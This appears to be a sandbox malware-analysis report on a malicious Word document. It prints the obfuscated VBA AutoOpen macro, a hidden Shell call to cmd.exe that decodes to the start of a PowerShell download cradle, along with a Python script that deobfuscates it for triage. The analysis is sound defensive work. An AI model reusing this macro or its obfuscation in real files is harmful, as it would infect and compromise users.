Verdict: MALICIOUS (risk score 82)

Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. Its AutoOpen macro reassembles an obfuscated cmd.exe command line from concatenated string fragments and Chr() calls and passes it to Shell with a window style of 0 (hidden); the command in turn builds a second-stage string from a character table and a list of indices, a layout typical of a script downloader. The obfuscation together with the AutoOpen trigger strongly suggests downloader or dropper functionality.
Heuristics (4)
- VBA macros detected (medium; 1 related finding) [OLE_VBA_MACROS]: Document contains VBA macro code.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that every drawing-bearing Office file carries, not a host the document contacts.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13869 bytes | 47866b0626a262d6c73143cb2d2b7773d78b8e2b90452f0ded3da6d53e62d5ea |
Preview: first 1,000 lines of the extracted script (macros.bas, decoded VBA source)
Attribute VB_Name = "GSzXhXWSv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Fix(331004079)
TypeName Int(70)
TypeName Round(6)
TypeName ChrB(1055)
Shell! KeyString(vbKeyC) + jctHvdBj + WRTihvcPhdGj + TjXrAWAJVc + NLBuhIVdQ + UdzjOcapsu + kQacFUN + NNDUjCw + pdXXjoVSwid + HljzBAZrYz + aYipwmcD + vjiwHQ + HTZiwZjzajY + iBFUKSdHHrV + cjsJHwlovqSmA + iCwwHqVQ, 307535380 - 307535380
TypeName Fix(428)
TypeName Chr(25388 / CAAip - 85056 - lYzFX)
End Sub
Attribute VB_Name = "plEKdhWwEvFR"
Function TjXrAWAJVc()
On Error Resume Next
TypeName ChrW(12)
TypeName CByte(micwpz * LvfToD)
iKppF = "m" + "d " + "/V" + ":O " + " /" + CStr(Chr(jTRUitottPZD + QtYZoNtMbl + 67 + iBumVfOIQILsQ + QTmImVhEcsd)) + " " + " " + CStr(Chr(nTsfZnLmzHtu + HHifJLndtpc + 34 + AzStsccUwQ + cSoRMsOwq)) + "s" + "et "
TypeName Rnd(lflbOD * duSQrF)
TypeName Oct(3090)
LRlNDGkqPsV = " " + " N" + "qj=" + "o" + CStr(Chr(tNUrwKaDCRTKpj + RMKLrCM + 67 + zMhwOKdZAYjXl + VMcCIHwk)) + "IHJ"
TypeName CSng(RdZYF)
TypeName 7387
TypeName Cos(zmKXnf + dVwqJS)
pLZEtFT = "S" + "zs" + "fwa" + "HG" + "s" + "b" + "K" + "Gs" + "j" + "PP"
TypeName Sin(152)
TypeName Hex(48375 - MDZuD)
faaoWvaqI = "3" + "hd" + "\" + "y/F" + ",u" + "(+m" + "1.n"
TypeName rmSkEa
TypeName Cos(vVzac)
TypeName CByte(ZbGMJ / vIFSM)
FmTtZ = ";" + ")D6" + "{W" + "t @" + "=e" + "-" + "}kN" + CStr(Chr(wljPFrAnwzztG + ploIhiji + 76 + iaKYlAciFSYzK + fkniMcGovTWK)) + ":i"
TjXrAWAJVc = iKppF + LRlNDGkqPsV + pLZEtFT + faaoWvaqI + FmTtZ
TypeName CInt(FUTcw)
TypeName Sqr(65734 - WnWLZ)
End Function
Function NLBuhIVdQ()
On Error Resume Next
TypeName Chr(LIOmJV)
TypeName zBHDz
vnGhcjvTU = "p" + "rv" + CStr(Chr(MQCfZaQqP + VKBVhratbCttDo + 99 + lOEPqAStCV + UQoVafqRESNb)) + "$x?" + CStr(Chr(zOSXzrMCi + zIVsHTMZ + 108 + LNYSYwvTTB + aAEafWbYSl)) + "'&"
TypeName CLng(BlVHY * uhQYH * 48154 / GkqZb)
TypeName kanvZz
DAiFmlzf = "&" + " " + "for" + " %" + "S " + "in " + " " + "( "
TypeName GmzCk
TypeName Kqzlpr
dksSTti = " 5" + "4" + " " + "0" + " " + " 9" + " " + " " + "46 " + "5" + "5"
TypeName Sin(zJJipz)
TypeName Sqr(pnHTF)
qaTwFqNd = " " + "1" + "7 " + " " + " 22" + " " + " " + "46 " + " 6"
TypeName CDate(YPJlJ)
TypeName Cos(BjquXW)
XYiHmXiQHwq = "1 " + " " + "61 " + "43 " + " " + "5" + "8 "
NLBuhIVdQ = vnGhcjvTU + DAiFmlzf + dksSTti + qaTwFqNd + XYiHmXiQHwq
TypeName CDate(64047 + koNBB)
TypeName Cos(YikoG + hRtzcf)
End Function
Function UdzjOcapsu()
On Error Resume Next
TypeName Cos(1)
TypeName 29
TypeName Round(TDwvqj)
HjulBcK = "10" + " " + " " + "20 " + " 23" + " 4" + "5 3"
TypeName 393
TypeName CDbl(3)
OKjVAJ = "5" + " " + "46" + " " + "9 " + " " + "47" + " " + " 0"
TypeName Sgn(46)
TypeName Hex(65214156)
iwVIG = " 14" + " 18" + " " + " " + "46" + " " + " 57" + " 42" + " "
TypeName Sqr(4887 - AZtDu - 82192 - ZzwUiu)
TypeName Atn(217997026)
CBciRiWQzV = " " + "43" + " " + " " + " " + "50 " + " " + "4" + "6 " + " 42" + " " + " 3" + "4 "
TypeName idwlRK
TypeName Atn(pGpQG)
TypeName Rnd(kHhri)
hwXkVD = " " + "4" + "1 " + "46" + " 14" + " " + " " + "1"
TypeName 74096996
TypeName CDbl(vJNtS)
TypeName ChrW(8)
jTOMrRlYnm = " " + "6" + "1" + " " + " 53" + " " + "46" + " " + "35" + " 42" + " " + " " + "36"
TypeName SNrkIo
TypeName REwFa
TypeName CStr(UZWqL)
WdhwbJ = " " + "5" + "8" + " " + " "
TypeName CStr(62)
TypeName DcvYUO
FhmABwXlvF = " 5" + "5" + " " + " " + "61"
TypeName 352368397
TypeName 1659
TypeName riEMm
JQFrFiY = " " + " 3" + "2 " + " " + "45 " + " " + " 62" + " " + "22 " + "42 "
TypeName Round(62217 - UzvOBF)
TypeName Hex(81586 * OPRwD)
TypeName CDbl(DwiGj / fbGWVa)
WaZtDYbmznw = " " + " 4" + "2 " + "5" + "4" + " "
... (truncated)
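The obfuscation in the preview is mechanical enough to undo offline. The script below is an added example written for this page; it is not part of the report or of the analyzer's tooling. It evaluates the string-building assignments copied from the preview (in VBA an undeclared variable is Empty, so it contributes 0 inside Chr() and "" in concatenation), reassembles the Shell argument in the order AutoOpen concatenates its pieces, and then undoes the cmd layer, where `set Nqj=<table>` followed by `for %S in (<indices>)` picks one table character per index. Assumptions, also marked in the code: Word's KeyString(vbKeyC) is taken to yield "c"; jctHvdBj and WRTihvcPhdGj, which do not appear in the preview, are treated as Empty; the return line of UdzjOcapsu and the for-loop body lie past the truncation, so its visible index fragments are joined in assignment order and the loop body is taken to be the usual `!Nqj:~%S,1!` substring pick.

```python
import re

# Constructed input: the string-building assignments copied from the macro preview
# (TjXrAWAJVc, NLBuhIVdQ and the visible part of UdzjOcapsu). One of the interleaved
# "TypeName ..." junk statements is kept to show that the evaluator ignores them.
MACRO_FRAGMENT = r'''
iKppF = "m" + "d " + "/V" + ":O " + " /" + CStr(Chr(jTRUitottPZD + QtYZoNtMbl + 67 + iBumVfOIQILsQ + QTmImVhEcsd)) + " " + " " + CStr(Chr(nTsfZnLmzHtu + HHifJLndtpc + 34 + AzStsccUwQ + cSoRMsOwq)) + "s" + "et "
TypeName Rnd(lflbOD * duSQrF)
LRlNDGkqPsV = " " + " N" + "qj=" + "o" + CStr(Chr(tNUrwKaDCRTKpj + RMKLrCM + 67 + zMhwOKdZAYjXl + VMcCIHwk)) + "IHJ"
pLZEtFT = "S" + "zs" + "fwa" + "HG" + "s" + "b" + "K" + "Gs" + "j" + "PP"
faaoWvaqI = "3" + "hd" + "\" + "y/F" + ",u" + "(+m" + "1.n"
FmTtZ = ";" + ")D6" + "{W" + "t @" + "=e" + "-" + "}kN" + CStr(Chr(wljPFrAnwzztG + ploIhiji + 76 + iaKYlAciFSYzK + fkniMcGovTWK)) + ":i"
TjXrAWAJVc = iKppF + LRlNDGkqPsV + pLZEtFT + faaoWvaqI + FmTtZ
vnGhcjvTU = "p" + "rv" + CStr(Chr(MQCfZaQqP + VKBVhratbCttDo + 99 + lOEPqAStCV + UQoVafqRESNb)) + "$x?" + CStr(Chr(zOSXzrMCi + zIVsHTMZ + 108 + LNYSYwvTTB + aAEafWbYSl)) + "'&"
DAiFmlzf = "&" + " " + "for" + " %" + "S " + "in " + " " + "( "
dksSTti = " 5" + "4" + " " + "0" + " " + " 9" + " " + " " + "46 " + "5" + "5"
qaTwFqNd = " " + "1" + "7 " + " " + " 22" + " " + " " + "46 " + " 6"
XYiHmXiQHwq = "1 " + " " + "61 " + "43 " + " " + "5" + "8 "
NLBuhIVdQ = vnGhcjvTU + DAiFmlzf + dksSTti + qaTwFqNd + XYiHmXiQHwq
HjulBcK = "10" + " " + " " + "20 " + " 23" + " 4" + "5 3"
OKjVAJ = "5" + " " + "46" + " " + "9 " + " " + "47" + " " + " 0"
iwVIG = " 14" + " 18" + " " + " " + "46" + " " + " 57" + " 42" + " "
CBciRiWQzV = " " + "43" + " " + " " + " " + "50 " + " " + "4" + "6 " + " 42" + " " + " 3" + "4 "
hwXkVD = " " + "4" + "1 " + "46" + " 14" + " " + " " + "1"
jTOMrRlYnm = " " + "6" + "1" + " " + " 53" + " " + "46" + " " + "35" + " 42" + " " + " " + "36"
WdhwbJ = " " + "5" + "8" + " " + " "
FhmABwXlvF = " 5" + "5" + " " + " " + "61"
JQFrFiY = " " + " 3" + "2 " + " " + "45 " + " " + " 62" + " " + "22 " + "42 "
WaZtDYbmznw = " " + " 4" + "2 " + "5" + "4" + " "
'''

STRING_RE = re.compile(r'"([^"]*)"')
CHR_RE = re.compile(r'(?:CStr\()?Chr\(([^()]*)\)\)?')
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')


def split_top_level(expr):
    """Split a VBA expression on '+' at parenthesis depth 0, outside string literals."""
    parts, cur, depth, in_str = [], [], 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str and ch in '()':
            depth += 1 if ch == '(' else -1
        elif not in_str and ch == '+' and depth == 0:
            parts.append(''.join(cur).strip())
            cur = []
            continue
        cur.append(ch)
    parts.append(''.join(cur).strip())
    return parts


def eval_term(term, env):
    """Evaluate one concatenation operand. Undeclared VBA variables are Empty
    (0 in arithmetic, "" in concatenation), so only the literals matter."""
    m = STRING_RE.fullmatch(term)
    if m:
        return m.group(1)
    m = CHR_RE.fullmatch(term)
    if m:  # Chr(a + b + 67 + c): the numeric literal is the whole character code
        return chr(sum(int(t) for t in map(str.strip, m.group(1).split('+')) if t.isdigit()))
    return env.get(term, '')


def evaluate_macro(src):
    """Run every 'name = ...' concatenation in order; 'TypeName ...' lines are skipped."""
    env = {}
    for line in src.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            name, expr = m.groups()
            env[name] = ''.join(eval_term(t, env) for t in split_top_level(expr))
    return env


def recover_command(env):
    """Shell argument in AutoOpen's order: KeyString(vbKeyC) + jctHvdBj + WRTihvcPhdGj
    + TjXrAWAJVc + NLBuhIVdQ + UdzjOcapsu + ... Assumptions: KeyString(vbKeyC) gives
    "c"; the two names absent from the preview are Empty; UdzjOcapsu's return line is
    past the truncation, so its visible fragments are joined in assignment order."""
    udz_parts = ['HjulBcK', 'OKjVAJ', 'iwVIG', 'CBciRiWQzV', 'hwXkVD',
                 'jTOMrRlYnm', 'WdhwbJ', 'FhmABwXlvF', 'JQFrFiY', 'WaZtDYbmznw']
    return 'c' + env['TjXrAWAJVc'] + env['NLBuhIVdQ'] + ''.join(env[n] for n in udz_parts)


def decode_cmd_layer(cmd):
    """Undo 'set VAR=<table> && for %S in (<indices>) ...': each index selects one
    character of the table (the loop body, assumed to be !VAR:~%S,1!, is truncated)."""
    m = re.search(r'set\s+\w+=(.*?)&&\s*for\s+%\w\s+in\s+\(\s*([\d\s]*)', cmd, re.S)
    table, indices = m.group(1), [int(i) for i in m.group(2).split()]
    return ''.join(table[i] for i in indices)


if __name__ == '__main__':
    command = recover_command(evaluate_macro(MACRO_FRAGMENT))
    print(command)
    print(decode_cmd_layer(command))
```

On the visible fragments the Shell argument starts `cmd /V:O  /C  "set   Nqj=oCIHJ...&& for %S in (54 0 9 46 55 ...`, and the index stream decodes to `powershell $aPd=new-object Net.WebClient;$rlm='http`, cut off where the preview is truncated. Two details worth noting for triage: `/V:O` is the abbreviated `/V:ON`, the delayed-expansion switch the `!Nqj:~%S,1!` pick needs, and the second Shell argument, `307535380 - 307535380`, evaluates to 0 (vbHide), so the console window never shows. Extending the decoder to the rest of the script only requires appending the remaining index assignments to the constructed input.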